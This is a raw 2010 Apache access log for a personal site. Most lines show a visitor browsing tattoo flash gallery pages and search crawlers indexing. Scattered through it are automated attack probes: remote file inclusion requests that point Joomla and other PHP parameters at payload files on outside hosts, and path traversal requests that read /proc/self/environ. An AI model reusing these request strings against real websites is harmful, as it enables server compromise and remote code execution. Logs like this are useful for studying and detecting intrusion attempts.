78.110.50.139 - - [01/May/2010:05:30:12 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:05:30:12 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:05:30:12 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:05:33:26 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.31.164 - - [01/May/2010:05:39:00 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.31.164 - - [01/May/2010:05:39:01 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.31.164 - - [01/May/2010:05:39:01 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
78.110.50.139 - - [01/May/2010:05:39:06 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
92.41.240.134 - - [01/May/2010:05:45:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:45:48 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:45:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:00 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:01 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:01 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:02 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:02 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:02 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:02 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:03 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:03 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:04 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:04 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:23 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:23 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:24 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:24 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:25 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:25 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:25 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:25 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:26 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:26 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:26 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:38 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:39 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:39 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:41 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:41 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:42 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:42 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:42 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:42 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:43 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:46:43 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
208.115.111.248 - - [01/May/2010:05:47:05 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:05:47:07 -0500] "GET /logs/access_log.1236038400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:05:47:09 -0500] "GET /logs/access_log.1241913600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:05:47:12 -0500] "GET /logs/access_log.1246924800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:05:47:13 -0500] "GET /logs/access_log.1248566400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:05:47:16 -0500] "GET /logs/access_log.1261958400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.13.138 - - [01/May/2010:05:47:54 -0500] "GET /logs/access_log.1156032000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.41.240.134 - - [01/May/2010:05:48:22 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:22 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:23 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:23 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:24 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:24 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:24 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:24 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:25 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:25 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:25 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:39 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:39 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:39 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
92.41.240.134 - - [01/May/2010:05:48:40 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
207.46.204.186 - - [01/May/2010:05:54:54 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.241.190.214 - - [01/May/2010:06:00:38 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [01/May/2010:06:00:38 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [01/May/2010:06:00:40 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
212.175.146.45 - - [01/May/2010:06:02:12 -0500] "GET /logs/access_log.1219708800//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.76"
212.175.146.45 - - [01/May/2010:06:02:12 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.76"
212.175.146.45 - - [01/May/2010:06:02:13 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.76"
195.130.126.109 - - [01/May/2010:06:04:36 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.130.126.109 - - [01/May/2010:06:04:36 -0500] "GET /index0.php?show=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.130.126.109 - - [01/May/2010:06:04:36 -0500] "GET /logs/access_log.1270684800/index0.php?show=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.130.126.109 - - [01/May/2010:06:04:36 -0500] "GET /logs/index0.php?show=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.232.85.247 - - [01/May/2010:06:07:06 -0500] "GET /logs/access_log.1219708800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:06:07:06 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:06:07:06 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.62.121.162 - - [01/May/2010:06:09:56 -0500] "GET /logs//citywriter/head.php?path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.62.121.162 - - [01/May/2010:06:09:56 -0500] "GET /logs/access_log.1270598400//citywriter/head.php?path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.62.121.162 - - [01/May/2010:06:09:56 -0500] "GET //citywriter/head.php?path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:22 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:22 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:23 -0500] "GET /logs/access_log.1268611200%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:23 -0500] "GET /logs/access_log.1268611200//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:23 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:23 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:25 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:25 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:25 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:26 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:26 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:26 -0500] "GET /logs/access_log.1268611200//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
